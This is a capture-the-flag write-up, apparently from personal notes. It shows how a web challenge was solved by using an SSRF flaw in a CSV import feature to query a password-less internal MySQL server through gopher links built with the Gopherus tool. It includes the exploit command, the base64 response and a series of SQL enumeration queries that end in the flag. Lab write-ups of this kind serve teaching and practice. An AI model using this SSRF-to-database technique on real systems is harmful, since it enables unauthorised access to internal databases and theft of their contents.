![43e8a55cc6906b58027ff646aef7d714.png](0ebf6e35dc0d426a8c77cfb6e54397ab.png) While logged in as admin, we see a **messages** button, clicking that reveals ![7570a88f3bf06f4f201d61c1ec8ca6b2.png](e34acd03d04343918d1299528f90f1dc.png) So `brian` has a **mysql** database that isn't password protected. Neat. The server configuration confirms the existance of a **mysql** server ![3afe5fdb3181f7c575e4647dd7c0eca3.png](cebf0c3f22874be7afc5283c2796403b.png) Thinks we know: 1. brian has a mysql server that doesn't require a password 2. the mysql server is at `` 3. The server is vulnerable to **SSRF** There's a tool called **gopherus** that is built for attacking things like **mysql** using **SSRF**. It will build a **gohper** link for us to use https://github.com/tarunkant/Gopherus `gopherus --exploit mysql` ![091fd0f0915d6adf7185a3854a73c72a.png](81b65e0a210e44529e2779fe63818ed9.png) adding that **gopher link** to our **CSV** and editing the **url** to match what it says in the config file (, we get back ``` Log: Resp: shipmentID,arrival_date,catalogURL Resp: SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA invalid format! Cannot import records! ``` More base64 ![172daae54d361ddd734d2bee4d2a207e.png](8218a9cd4c09411880759fd12b7de1c6.png) Looks like there's a database called `webnote`. Using **gopherus** to issue these commands, we can enumerate the database 1. `show databases;` - reveals the database `webnote` 2. `use webnote; show tables;` - reveals the table `settings` 3. `use webnote; select column_name from information_schema.columns where table_schema = 'webnote' and table_name = 'settings';` - reveals the columns `apikey` and `note` 4. `use webnote; select note from settings;` - gives the flag ![5e3131c1295e9cd09e49d84edb86b54b.png](10b86198686349759874cc4dc5753cf9.png) `flag{bu7_50m37im3s_Y0u_N33d_i11usi0n}` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #web #ssrf #mysql #sql Related: